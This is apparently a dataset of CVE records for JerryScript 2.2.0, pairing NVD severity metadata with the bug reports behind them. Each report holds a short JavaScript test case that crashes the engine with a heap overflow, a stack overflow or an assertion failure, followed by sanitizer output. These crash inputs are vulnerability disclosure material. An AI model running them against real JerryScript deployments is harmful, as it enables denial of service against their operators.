[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/3749
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision bd1c4df ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on ###### Test case try { [].length = { valueOf: function() { return String("abcdabcd").split("").push (-62167219200000, '"\\ubad"', '"\\u', new RegExp([ 4294967294, ], "g").exec(1), 1, 1, 1, 1, 1, 1), Object.freeze (Array.prototype); } } assert (false); } catch (e) { Array.prototype.splice(Function.prototype, ("function a() { return 8; }"), this); } ###### Output Script Error: TypeError: Invalid argument type. ================================================================= ==97903==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf6000260 at pc 0x0809632c bp 0xfff4f018 sp 0xfff4f008 READ of size 4 at 0xf6000260 thread T0 #0 0x809632b in jmem_pools_collect_empty /home/jerryscript/jerry-core/jmem/jmem-poolman.c:165 #1 0x8095f01 in jmem_pools_finalize /home/jerryscript/jerry-core/jmem/jmem-poolman.c:44 #2 0x809553f in jmem_finalize /home/jerryscript/jerry-core/jmem/jmem-allocator.c:161 #3 0x804d6a6 in jerry_cleanup /home/jerryscript/jerry-core/api/jerry.c:255 #4 0x804b545 in main /home/jerryscript/jerry-main/main-unix.c:994 #5 0xf7801636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #6 0x8049030 (/home/jerryscript/build/bin/jerry+0x8049030) 0xf6000260 is located 8 bytes to the right of 8-byte region [0xf6000250,0xf6000258) allocated by thread T0 here: #0 0xf7a35dee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x809581b in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80958eb in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x8095952 in jmem_heap_alloc_block_internal /home/jerryscript/jerry-core/jmem/jmem-heap.c:308 #4 0x809606b in jmem_pools_alloc /home/jerryscript/jerry-core/jmem/jmem-poolman.c:85 #5 0x80c3351 in ecma_alloc_number /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:57 #6 0x806737c in ecma_create_float_number /home/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:487 #7 0x8067fc4 in ecma_copy_value /home/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:838 #8 0x8068172 in ecma_fast_copy_value /home/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:881 #9 0x8089f60 in ecma_op_object_find_own /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:505 #10 0x808a810 in ecma_op_object_get_with_receiver /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:830 #11 0x808a916 in ecma_op_object_get /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:799 #12 0x808a916 in ecma_op_object_get_by_uint32_index /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:862 #13 0x80c8d98 in ecma_op_array_get_to_string_at_index /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:310 #14 0x80c8ed9 in ecma_builtin_array_prototype_join /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:360 #15 0x80cd66a in ecma_builtin_array_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2653 #16 0x807aa06 in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1095 #17 0x807abac in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1119 #18 0x8083dce in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:782 #19 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085 #20 0x80c885f in ecma_builtin_array_prototype_object_to_string /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:151 #21 0x80cd4d5 in ecma_builtin_array_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2596 #22 0x807aa06 in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1095 #23 0x807abac in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1119 #24 0x8083dce in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:782 #25 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085 #26 0x80877f8 in ecma_op_general_object_ordinary_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:324 #27 0x8087718 in ecma_op_general_object_default_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:289 #28 0x808bc85 in ecma_op_object_default_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1720 #29 0x80803b5 in ecma_op_to_primitive /home/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:199 #30 0x80809c0 in ecma_op_to_string /home/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:413 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/jmem/jmem-poolman.c:165 jmem_pools_collect_empty Shadow bytes around the buggy address: 0x3ebffff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ec00000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00030: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa =>0x3ec00040: fa fa fd fa fa fa fd fa fa fa 00 fa[fa]fa fd fa 0x3ec00050: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x3ec00060: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x3ec00070: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa 0x3ec00080: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa 0x3ec00090: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==97903==ABORTING Credits: This vulnerability is detected by chong from OWL337.
heap-buffer-overflow in the jmem_pools_collect_empty
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3749/comments
0
2020-05-17T04:04:34Z
2020-05-20T10:10:06Z
https://github.com/jerryscript-project/jerryscript/issues/3749
619,604,019
3,749
2,033
CVE-2020-23306
2021-06-10T23:15:07.810
There is a stack-overflow at ecma-regexp-object.c:535 in ecma_regexp_match in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3753" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3753" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/3753
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision bd1c4df ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on ``` ###### Test case ``` r = new RegExp ("(()*?)+?a"); assert (r.exec("ba")[0] == "a"); ``` ###### Output ``` ASAN:SIGSEGV ================================================================= ==103435==ERROR: AddressSanitizer: stack-overflow on address 0xff318fcc (pc 0x0808fc96 bp 0xff319158 sp 0xff318fb0 T0) #0 0x808fc95 in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:535 #1 0x80915ee in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1060 #2 0x80915ee in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1060 #3 0x8091111 in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:995 #4 0x8091b54 in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1122 #5 0x80915ee in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1060 #6 0x8091b54 in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1122 ... #249 0x8091b54 in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1122 #250 0x8091b54 in ecma_regexp_match /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1122 SUMMARY: AddressSanitizer: stack-overflow /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:535 ecma_regexp_match ==103435==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337.
stack-overflow in ecma_regexp_match
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3753/comments
6
2020-05-18T05:18:42Z
2020-05-26T13:29:29Z
https://github.com/jerryscript-project/jerryscript/issues/3753
619,915,696
3,753
2,034
CVE-2020-23308
2021-06-10T23:15:07.843
There is an Assertion 'context_p->stack_top_uint8 == LEXER_EXPRESSION_START' at js-parser-expr.c:3565 in parser_parse_expression in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3819" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3819" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3819
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` typeof (global.v2) = 123; ``` ###### Output ``` ICE: Assertion 'context_p->stack_top_uint8 == LEXER_EXPRESSION_START' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_expression):3565. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context_p->stack_top_uint8 == LEXER_EXPRESSION_START' in parser_parse_expression
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3819/comments
0
2020-05-31T13:53:00Z
2020-06-03T13:29:27Z
https://github.com/jerryscript-project/jerryscript/issues/3819
627,968,037
3,819
2,035
CVE-2020-23309
2021-06-10T23:15:07.877
There is an Assertion 'context_p->stack_depth == context_p->context_stack_depth' failed at js-parser-statm.c:2756 in parser_parse_statements in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3820" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3820" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3820
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` try { (isNaN(parseFloat("."))) = 'abcd'; } catch (e) { } ``` ###### Output ``` ICE: Assertion 'context_p->stack_depth == context_p->context_stack_depth' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_statements):2756. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context_p->stack_depth == context_p->context_stack_depth' in parser_parse_statements
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3820/comments
0
2020-05-31T14:20:41Z
2020-06-03T13:29:27Z
https://github.com/jerryscript-project/jerryscript/issues/3820
627,972,924
3,820
2,036
CVE-2020-23310
2021-06-10T23:15:07.910
There is an Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at js-parser-statm.c:733 in parser_parse_function_statement in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3821" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3821
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function a") { ``` ###### Output ``` ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_function_statement):733. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' in parser_parse_function_statement
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3821/comments
0
2020-06-01T03:00:22Z
2020-06-04T09:25:26Z
https://github.com/jerryscript-project/jerryscript/issues/3821
628,117,790
3,821
2,037
CVE-2020-23311
2021-06-10T23:15:07.943
There is an Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at js-parser-expr.c:3230 in parser_parse_object_initializer in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3822" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3822" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3822
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function f ({array, 'a', { value: 'foo', enumerable: true } : 36}) {} ``` ###### Output ``` ICE: Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_object_initializer):3230. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' in parser_parse_object_initializer
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3822/comments
0
2020-06-01T03:10:23Z
2020-06-03T13:28:14Z
https://github.com/jerryscript-project/jerryscript/issues/3822
628,120,323
3,822
2,038
CVE-2020-23312
2021-06-10T23:15:07.980
There is an Assertion 'context.status_flags & PARSER_SCANNING_SUCCESSFUL' failed at js-parser.c:2185 in parser_parse_source in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3824" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3824" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3824
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` var a = { "foo//b", }; ``` ###### Output ``` ICE: Assertion 'context.status_flags & PARSER_SCANNING_SUCCESSFUL' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_source):2185. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context.status_flags & PARSER_SCANNING_SUCCESSFUL' in parser_parse_source
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3824/comments
0
2020-06-01T04:16:48Z
2020-06-03T13:28:14Z
https://github.com/jerryscript-project/jerryscript/issues/3824
628,139,379
3,824
2,039
CVE-2020-23313
2021-06-10T23:15:08.020
There is an Assertion 'scope_stack_p > context_p->scope_stack_p' failed at js-scanner-util.c:2510 in scanner_literal_is_created in JerryScript 2.2.0
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": 